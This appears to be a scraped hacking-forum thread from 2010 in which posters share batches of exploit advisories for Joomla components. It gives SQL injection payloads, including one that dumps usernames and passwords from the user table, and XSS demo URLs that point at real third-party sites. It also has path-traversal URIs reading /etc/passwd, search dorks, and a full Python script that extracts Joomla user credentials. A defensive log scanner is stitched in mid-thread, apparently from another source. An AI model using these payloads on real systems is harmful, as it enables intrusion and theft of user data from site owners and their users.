    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_departments&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4,5,6,7,8--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    
    [~] Demo            :
    
    http://server/index.php?option=com_departments&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_units SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_units SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
     
    [~]######################################### InformatioN #############################################[~]
      
    [~] Title     : Joomla Component com_units SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
      
    [~]#########################################   ExploiT   #############################################[~]
      
    [~] Vulnerable File :
      
    http://127.0.0.1/index.php?option=com_units&task=unit&id=[SQL]
      
    [~] ExploiT         :
      
    -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
      
    [~] Example         :
      
    http://127.0.0.1/index.php?option=com_units&task=unit&id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
     
    [~]######################################### ThankS To ... ############################################[~]
      
    [~] Special Thanks To My Best FriendS :
      
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
      
    [~] IRANIAN Young HackerZ
      
    [~]#########################################   FinisH :D   #############################################[~]
    // sebug.net [2010-03-29]
    Joomla Component com_radio SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_radio SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_radio SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4,5,6,7,8--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
    
    [~] Demo            :
    
    http://server/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,version(),5,6,7,8--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_business SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_business SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-29
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_business SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_business&view=business&region=37&category_id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3--
    
    [~] Demo            :
    
    http://server/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,version()--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_adds Blind SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_adds Blind SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_adds Blind SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_adds&action=view&catid=[Blind SQL]
     
    [~] ExploiT         :
     
    12+AND+1=0+UNION+SELECT+1,2--
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2--
    
      
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
    Joomla Component com_personal SQL Injection Vulnerability
    Code:
    # Title : Joomla Component com_personal SQL Injection Vulnerability
    # Author: DevilZ TM
    # Data  : 2010-03-28
    
    [~]######################################### InformatioN #############################################[~]
     
    [~] Title     : Joomla Component com_personal SQL Injection Vulnerability
    [~] Author    : DevilZ TM By D3v1l
    [~] Homepage  : http://www.DEVILZTM.com
    [~] Email     : Expl0it@DevilZTM.Com
    [~] Contact   : D3v1l.blackhat@yahoo.com
     
    [~]#########################################   ExploiT   #############################################[~]
     
    [~] Vulnerable File :
     
    http://127.0.0.1/index.php?option=com_personal&pid=56&id=[SQL]
     
    [~] ExploiT         :
     
    -1 UNION SELECT 1,2,3,4
     
    [~] Example         :
     
    http://127.0.0.1/index.php?option=com_personal&pid=56&id=-1 UNION SELECT 1,2,3,4
     
    [~]######################################### ThankS To ... ############################################[~]
     
    [~] Special Thanks To My Best FriendS :
     
    Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
     
    [~] IRANIAN Young HackerZ
     
    [~]#########################################   FinisH :D   #############################################[~]
     
    29 Mar 2010
  12. EXploit
    EXploit Advanced
    Likes:
    50
    Another lousy day for components...

    Joomla Component com_store XSS Vulnerability
    Code:
    [x] Joomla Component Store
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Store
    [x] Example: http://www.site.com/index.php?option=com_store=[XSS]
    [x] Demo: http://www.kingpincruisers.net/index.php?option=com_store=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_jombib XSS Vulnerability
    Code:
    [x] Joomla Component Jombib
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Jombib
    [x] Example: http://www.site.com/index.php?option=com_jombib=[XSS]
    [x] Demo: http://www.lec.df.uba.ar/index.php?option=com_jombib=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_hotproperty XSS Vulnerability
    Code:
    [x] Joomla Component Hotproperty
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Hotproperty
    [x] Example: http://www.site.com/index.php?option=com_hotproperty=[XSS]
    [x] Demo:http://www.montblanc-retreats.com/index.php?option=com_hotproperty=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_bookmarks XSS Vulnerability
    Code:
    [x] Joomla Component  Bookmarks
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Bookmarks
    [x] Example: http://www.site.com/index.php?option=com_bookmarks=[XSS]
    [x] Demo:http://www.movinganthropology.de/index.php?option=com_bookmarks=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_zelig SQL Injection Vulnerability
    Code:
    [x] Joomla Component  Zelig
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: Sql Injection on Component Zelig (id)
    [x] Example: http://www.site.com/index.php?option=com_zelig&view=person&id=[Sql Injection]
    [x] Demo:http://www.zeligfilm.it/index.php?o...8,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
    [x] Made in Brazil
    Joomla Component com_product XSS Vulnerability
    Code:
    [x] Joomla Component Product
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Product
    [x] Example: http://www.site.com/index.php?option=com_product=[XSS]
    [x] Demo: http://www.breastcancercampaign.org/index.php?option=com_product=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    
    Joomla Component com_imoti XSS Vulnerability
    Code:
    [x] Joomla Component Imoti
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Imoti
    [x] Example: http://www.site.com/index.php?option=com_imoti=[XSS]
    [x] Demo: http://www.bulgarian1stlineproperties.com/index.php?option=com_imoti=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_extcalendar XSS Vulnerability
    Code:
    [x] Joomla Component Extcalendar
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Extcalendar
    [x] Example: http://www.site.com/index.php?option=com_extcalendar=[XSS]
    [x] Demo:http://www.ctsalsa.com/cms/index.php?option=com_extcalendar=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_mosforms XSS Vulnerability
    Code:
    [x] Joomla Component Mosforms
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Mosforms
    [x] Example: http://www.site.com/index.php?option=com_mosforms=[XSS]
    [x] Demo: http://www.euskaletxeak.net/index.php?option=com_mosforms=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_comprofiler XSS Vulnerability
    Code:
    [x] Joomla Component Comprofiler
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Comprofiler
    [x] Example: http://www.site.com/index.php?option=com_comprofiler=[XSS]
    [x] Demo: http://www.euskaletxeak.net/index.php?option=com_comprofiler=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Another hole in a component
    Joomla com_qpersonel SQL Injection Exploit
    Code:
    #!/usr/bin/python
    
    # Joomla com_qpersonel SQL Injection Remote Exploit
    # Version 1.0 (23th May 2010 (public release)
    # By Valentin Hoebel (valentin@xenuser.org)
    # ASCII FOR BREAKFAST
    #
    # EXPLOIT BASED ON MY COLUMN FUZZER
    # Fuzzer was enhanced so it serves as a Joomla Exploiter template
    #
    # ------------------------------------------------------------------------
    # Exploits the SQL injection vulnerability I discovered
    # on 13th April 2010.
    #
    # Copy, modify, distribute and share the code as you like!
    # Warning: I am not responsible for any damage you might cause!
    # Exploit written for educational purposes only.
    
    import sys,  re,  urllib,  urllib2,  string
    from urllib2 import Request, urlopen, URLError, HTTPError
    
    # Define the max. amounts for trying
    max_columns = 100
    
    # Prints usage
    def print_usage():
        print ""
        print "================================================================================="
        print " Joomla com_qpersonel SQL Injection Remote Exploit"
        print " by Valentin Hoebel (valentin@xenuser.org)"
        print ""
        print " Vulnerable URL example:"
        print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1"
        print ""
        print " Usage:"
        print "         -u <URL> (e.g. -u \"http://target/index.php?option=com_qpersonel&task=qpListele&katid=1\")"
        print "         --help   (displays this text)"
        print ""
        print " Read the source code if you want to know more about this vulnerability."
        print " For educational purposes only! I am not responsible if you cause any damage!"
        print ""
        print "================================================================================="
        print ""
        print ""
        return
    
    #Prints banner
    def print_banner():
        print ""
        print "================================================================================="
        print ""
        print " Joomla com_qpersonel SQL Injection Remote Exploit"
        print " by Valentin Hoebel (valentin@xenuser.org)"
        print ""
        print " For educational purposes only! I am not responsible if you cause any damage!"
        print ""
        print "================================================================================="
        print ""
        return
    
    # Testing if URL is reachable, with error handling
    def test_url():
        print ">> Checking if connection can be established..."
        try:
            response = urllib2.urlopen(provided_url)
            
        except HTTPError,  e:
            print ">> The connection could not be established."
            print ">> Error code: ",  e.code
            print ">> Exiting now!"
            print ""
            sys.exit(1)
        except URLError,  e:
            print ">> The connection could not be established."
            print ">> Reason: ",  e.reason
            print ">> Exiting now!"
            print ""
            sys.exit(1)
        else:
            valid_target = 1
            print ">> Connected to target! URL seems to be valid."
            print ""
        return
    
    # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
    def find_columns():
        # Define some important variables and make the script a little bit dynamic
        number_of_columns = 1
        column_finder_url_string = "+AND+1=2+UNION+SELECT+"
        column_finder_url_message = "0x503077337220743020743368206330777321"
        column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
        column_finder_url_terminator = "+from+jos_users--"
        next_column = ","
        column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)"
        
        # Craft the final URL to check
        final_check_url = provided_url+column_finder_url_string+column_finder_url_message 
        print ">> Trying to find the correct number of columns..."
        
        for x in xrange(1, max_columns):
            # Visit website and store response source code of site
            final_check_url2 = final_check_url+column_finder_url_terminator 
            response = urllib2.urlopen(final_check_url2)
            html = response.read()
            find_our_injected_string = re.findall(column_finder_url_message_plain, html)
            
            # When the correct amount was found we display the information and exit
            if len(find_our_injected_string) != 0:
                print ">> Correct number of columns found!"
                print ">> Amount: ",  number_of_columns
                       
                # Craft our exploit query
                malicious_query =  string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
                print ""      
                print ">> Trying to fetch the first user of the Joomla user table..."
    
                # Receive the first user of the Joomla user table
                response = urllib2.urlopen(malicious_query)
                html = response.read()
                get_secret_data = string.find(html,  "P0w3r t0 t3h c0ws!")
                get_secret_data += 18
                new_html = html[get_secret_data :]
                new_get_secret_data = string.find(new_html,  "P0w3r t0 t3h c0ws!")
                new_html_2 = new_html[:new_get_secret_data]
                print "name, username, password, e-mail address and user status are shown"
                print new_html_2
                print ""
                
                # Offer to display all entries of the Joomla user table
                user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
                if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                    print ""
                    print "-------------------------------------------------------------"
                    print new_html 
                    print "-------------------------------------------------------------"
                    print "The seperator for the single entries is: ",  column_finder_url_message_plain
                    print "Bye!"
                    print ""
                    print ""
                    sys.exit(1)
                else:
                    print "Bye!"
                    print ""
                    print ""
                    sys.exit(1)
            
            # Increment counter var by one
            number_of_columns  += 1
            
            #Add a new column to the URL
            final_check_url += next_column
            final_check_url += column_finder_url_message         
         
        # If fuzzing is not successfull print this message 
        print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
        print "Bye!"
        print ""
        print ""
        
    
    # Checking if argument was provided
    if len(sys.argv) <=1:
        print_usage()
        sys.exit(1)
        
    for arg in sys.argv:
        # Checking if help was called
        if arg == "--help":
            print_usage()
            sys.exit(1)
        
        # Checking if  URL was provided, if yes -> go!
        if arg == "-u":
            provided_url = sys.argv[2]
            print_banner()
            
            # At first we test if we can actually reach the provided URL
            test_url()
            
            # Now start with finding the correct amount of columns
            find_columns()
        
    ### EOF ###
    
     
    Last edited: 24 May 2010
    19 May 2010
    3 users liked this.
  13. Nosaer
    Nosaer Moderator
    Likes:
    15
    Components

    Joomla JE Job
    Code:
    Example URI = index.php?option=com_jejob&view=../../../../../../etc/passwd%00
    JE Ajax Event Calendar
    Code:
    Example URI = index.php?option=com_jeajaxeventcalendar&view=../../../../../../etc/passwd%00
    3D user cloud
    Code:
    http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    Code:
    http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
     
    1 Jun 2010
    1 person likes this.
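
Added example, not part of the thread or of any poster's code: the request shapes listed in the posts above (UNION SELECT in a numeric parameter, `../` traversal ending in `%00` in `view`, markup or a `javascript:` URI in a query value) can be flagged in web server access logs. The log lines, IP addresses and rule names below are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed access-log lines modelled on the request shapes in this thread.
SAMPLE_LOG = "\n".join([
    r'192.0.2.10 - - [02/Jun/2010:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120',
    r'198.51.100.7 - - [02/Jun/2010:10:00:05 +0000] "GET /index.php?option=com_business&view=business&region=37&category_id=-1%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 4312',
    r'198.51.100.7 - - [02/Jun/2010:10:00:09 +0000] "GET /index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3/*&sort_by=ordering HTTP/1.1" 200 4410',
    r'198.51.100.7 - - [02/Jun/2010:10:00:12 +0000] "GET /index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2-- HTTP/1.1" 200 4011',
    r'198.51.100.7 - - [02/Jun/2010:10:00:15 +0000] "GET /index.php?option=com_personal&pid=56&id=-1%2520UNION%2520SELECT%25201,2,3,4 HTTP/1.1" 200 3980',
    r'198.51.100.7 - - [02/Jun/2010:10:00:20 +0000] "GET /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 HTTP/1.1" 200 1822',
    r'203.0.113.5 - - [02/Jun/2010:10:01:00 +0000] "GET /index.php?option=com_store=\">><marquee>test</marquee> HTTP/1.1" 200 3900',
    r'203.0.113.5 - - [02/Jun/2010:10:01:04 +0000] "GET /modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(1)%27%3EClick%3C/a%3E%3C/tags%3E HTTP/1.1" 200 20480',
    r'192.0.2.10 - - [02/Jun/2010:10:02:00 +0000] "GET /index.php?option=com_search&searchword=european+union+members HTTP/1.1" 200 6100',
    r'not a log line',
])

# The request field may contain backslash-escaped quotes, so it is matched pair-wise.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3})\b')

# Rule names are illustrative; patterns run on the normalised parameter value.
RULES = {
    "sqli_union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "path_traversal": re.compile(r"\.\./|\.\.\\"),
    "null_byte": re.compile(r"\x00"),
    "markup_or_js_uri": re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:"),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
COMPONENT = re.compile(r"com_[a-z0-9_]+")


def normalise(value, max_rounds=3):
    """Decode repeatedly (double encoding), drop inline SQL comments, fold case."""
    decoded = unquote_plus(value)
    for _ in range(max_rounds - 1):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    decoded = SQL_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def split_request(req):
    """Return (method, target); the target may contain raw spaces or escaped quotes."""
    method, _, rest = req.partition(" ")
    target = re.sub(r" HTTP/\d(?:\.\d)?$", "", rest)
    return method, target.replace('\\"', '"')


def inspect_target(target):
    """Return (component, {param: [rule, ...]}) for one request target."""
    _, _, query = target.partition("?")
    component, hits = None, {}
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = normalise(raw)
        if name == "option":
            m = COMPONENT.match(value)
            component = m.group(0) if m else None
        matched = [rule for rule, rx in RULES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return component, hits


def scan(log_text):
    """Return one finding per log line whose query parameters match a rule."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skipped rather than guessed at
        _, target = split_request(m.group("req"))
        component, hits = inspect_target(target)
        if hits:
            findings.append({"line": lineno, "ip": m.group("ip"),
                             "status": int(m.group("status")),
                             "component": component, "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 only shows that the request was served, not that the component is vulnerable; the match is a triage signal to correlate with the installed component list.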
  14. EXploit
    EXploit Advanced
    Likes:
    50
    Joomla Component com_sar_news SQL Injection Vulnerability
    Code:
    # Exploit Title: Joomla com_sar_news SQL Injection vulnerability
    # Date: 02 juni 2010
    # Author: LyNx (syntax3rror@ymail.com)
    # Platform / Tested on: Windows XP 2
    # category: webapps/0day
    # Code :
     
    ==== SQLI EXPLOIT ====
    /**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
     
    ==== VULN IN HERE ====
     
    http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering
     
     
    ==== LIVE DEMO ====
     
    http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
     
    [x]-------------------------------------------------------------------
    Thanks To :
    system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,
    virgi, ranggamaggic, shadowsmaker
    suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia
    hacker and all outsider...
     
    [x]-------------------------------------------------------------------
    [x] www.indonesianhacker.or.id
    [x] strong, we shine
    [x]-------------------------------------------------------------------
    Joomla Component com_chronocontact SQL Injection Vulnerability
    Code:
    # Exploit Title: Joomla Component ChronoForms (com_chronocontact)
    # Date: 01, June 2010
    # Author:  _mlk_ (Renan)
    # Software Link:0
    # Version: 0
    # Tested on: all OS
    # CVE : 0
    # Code : here
     
    Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection Vulnerability
     
    ###################################################################################################################################
     
     
       [!] Discovered by : _mlk_ (Renan)
     
       [!] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
     
       [!] Homepages :  http://code.google.com/p/bugsec/  <>  http://botecounix.com.br/blog/  <>  http://c0d3rs.wordpress.com/
     
       [!] Location : Porto Alegre - RS, Brasil
                             (or Brazil)
     
    ###################################################################################################################################
     
     
          [-] Information
     
       [?] Script : ChronoForms for Joomla 1.5
     
       [?] Vendor :  http://www.chronoengine.com/
     
       [?] Dork/String :  "index.php?option=com_chronocontact" / "com_chronocontact"
     
       [?] Download : http://www.chronoengine.com/downloads/9-chronoforms.html
     
       [?] Date :  01, June 2010
     
     
    ###################################################################################################################################
     
     
          [*] Example :
     
             http://localhost/index.php?option=com_chronocontact&itemid=1 [Blind-SQL]
             http://localhost/[PATH]/index.php?option=com_chronocontact&itemid=1 [Blind-SQL]
     
     
    ###################################################################################################################################
     
     
        [~] Thanks :
     
            God, family, friends and Tricolor Gaúcho (Grêmio).
     
     
    ###################################################################################################################################
    Joomla Component com_chronoconnectivity SQL Injection Vulnerability
    Code:
    # Exploit Title: Joomla Component ChronoConnectivity
    # Date: 01, June 2010
    # Author:  _mlk_ (Renan)
    # Software Link: http://bugsec.googlecode.com/files/joomla_chronoconnectivity.zip
    # Version: 0
    # Tested on: all OS
    # CVE : 0
    # Code : here
     
    Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Vulnerability
     
    ###################################################################################################################################
     
     
       [!] Discovered by : _mlk_ (Renan)
     
       [!] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
     
       [!] Homepages :  http://code.google.com/p/bugsec/  <>  http://botecounix.com.br/blog/  <>  http://c0d3rs.wordpress.com/
     
       [!] Location : Porto Alegre - RS, Brasil
                             (or Brazil)
     
    ###################################################################################################################################
     
     
          [-] Information
     
       [?] Script : ChronoConnectivity for Joomla 1.5
     
       [?] Vendor :  http://www.chronoengine.com/
     
       [?] Dork/String :  "index.php?option=com_chronoconnectivity" / "com_chronoconnectivity"
     
       [?] Download : http://www.chronoengine.com/downloads/7-chronoconnectivity.html
     
       [?] Date :  01, June 2010
     
     
    ###################################################################################################################################
     
     
          [*] Example :
     
             http://localhost/index.php?option=com_chronoconnectivity&itemid=1 [Blind-SQL]
             http://localhost/[PATH]/index.php?option=com_chronoconnectivity&itemid=1 [Blind-SQL]
     
     
    ###################################################################################################################################
     
     
        [~] Thanks :
     
            God, family, friends and Tricolor Gaúcho (Grêmio).
     
     
    ###################################################################################################################################
    _http://inj3ct0r.com/​
     
    2 Jun 2010
    1 person likes this.
  15. EXploit
    EXploit Advanced
    Likes:
    50
    Another batch of holes in Joomla components

    Joomla Component com_cinema SQL Injection Vulnerability
    Code:
    # Exploit Title: joomla component cinema SQL injection Vulnerability
    # Date: 09 juny 2010
    # Author: Sudden_death (suddendeath404@yahoo.com)
    # Software Link: N/A
    # Tested on: Windows XP 2
    # Platform / Tested on: Windows XP 2 SP 2
    # myweb  : http://sudden.isgreat.org/
    # dork   : inurl:option=com_cinema
    
    ======================================================================
     
    # EXPLOIT / c0de
    
    -99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users--
     
    # VULN IN HERE
     
    http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit]
      
    # LIVE DEMO
     
    http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users--
      
    [#]-------------------------------------------------------------------
     
    GREETZ TO WE FORUM:
    -=-[ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org ]-=-
     
    [#]-------------------------------------------------------------------
     
    MY BROTHA :
    | bumble_be | Mr.SoOofe | BobyPutrA | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito |
    | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip |
    | angga | demnas | ELV1N4 | hateback | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | z0mb13 | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 |
    | r4tu_le64h | huda_style | ranggamagic | maximize13 | and you |
    [#]-------------------------------------------------------------------
     
    note: don't say everything you know, but know everything you say!
    Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
    Code:
    Name : Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
    Date : june, 9 2010
    Vendor url :http://jforjoomla.com/
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla 1.5 Jreservation Component for hotel booking system.
